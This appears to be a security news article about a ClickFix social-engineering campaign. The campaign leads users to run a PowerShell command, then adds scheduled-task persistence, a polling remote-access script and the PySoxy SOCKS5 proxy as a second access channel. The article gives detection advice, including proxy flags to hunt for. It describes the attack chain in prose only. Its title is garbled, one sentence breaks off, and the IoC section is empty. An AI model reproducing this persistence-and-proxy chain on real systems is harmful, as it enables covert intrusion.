ClickFix Integrates Old Open-Source Python S Evolves SOCKS5

The cyberattack campaign known as “ClickFix,” which manipulates users into executing malicious commands on their own systems, has evolved with a dangerous new development. While ClickFix techniques have circulated for some time, a recent incident reveals attackers are now integrating them with a 10-year-old open-source Python SOCKS5 proxy tool. This pairing creates a significantly more resilient form

What was once treated as a simple user mistake is now evolving into a complex multi-layered intrusion that can survive even after security tools step in to block it.

The attack begins when a user visits a compromised website that presents a fake prompt, convincing the visitor to paste and run a PowerShell command on their own machine. This well-known social engineering trick has been used in many previous campaigns before.

What makes this version different is what happens after that single command runs. Rather than stopping at one callback, the intrusion sets up automated access that continues long after the initial click.

Security researchers at ReliaQuest identified this updated campaign in April 2026, noting that it marked the first observed case where ClickFix execution was combined with PySoxy, a Python-based SOCKS5 proxy tool originally published roughly a decade ago.

The analysts described the result as a “durable access chain,” one that continued re-executing even after outbound connections were blocked by security controls. That detail alone signals a meaningful shift in how this threat behaves.

ClickFix Deploys PySoxy

The central lesson here is one that defenders often overlook: blocking an attacker’s connection does not mean the attack is over. In the incident studied, both of the attacker’s access channels were cut off by endpoint controls, yet a scheduled task already on the affected machine kept attempting to relaunch the malicious script for hours.

This persistence mechanism transformed a single user mistake into an ongoing compromise. Ransomware affiliates may eventually begin treating ClickFix as a primary entry point alongside other established access methods.

The operational similarities between this chain and SocGholish intrusions, which also rely on social engineering before moving into reconnaissance and proxy-based access, suggest ClickFix is maturing into a serious pre-ransomware delivery platform.

Once the initial PowerShell command ran, the attacker moved quickly to build a deeper foothold. A scheduled task was planted that relaunched a staged script from the C:ProgramData folder roughly every 40 minutes. That script functioned as a lightweight remote access tool, polling the attacker’s server every three seconds, executing commands on the host, and sending back results.

After establishing this PowerShell-based access, the attacker moved into reconnaissance. Built-in Windows tools were used to enumerate group memberships, identify domain controllers, and map other machines on the network. Only after confirming that a staging server could be reached did the attacker introduce PySoxy, downloading compiled Python bytecode and running it with proxy arguments pointing to a separate external IP address.

PySoxy gave the attacker a second, independent route back into the host. This second channel used different infrastructure and a different traffic pattern than the first, meaning that a complete shutdown of the PowerShell C2 connection would still leave this second door open. The attacker had built two separate access paths into the same environment.

Why a Blocked Callback Is Not Enough

The most important takeaway from this campaign is that containment requires more than blocking a single connection. Analysts recommend fully isolating the affected host and reviewing all scheduled tasks, particularly those created shortly after suspicious PowerShell activity. Any tasks pointing to scripts in non-standard directories like ProgramData should be treated as high-priority findings.

Incident responders should look for Python execution tied to proxy-style command-line arguments, specifically flags like -ssl, -remote_ip, and -remote_port, as well as compiled .pyc files in unexpected locations. Removing staged scripts, Python runtimes, and bytecode files is just as critical as blocking the network connection, because any leftover component can restart the chain. Treating a ClickFix incident as a potential full compromise rather than an isolated user error is now the only appropriate response.

Indicators of Compromise (IoCs):-

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.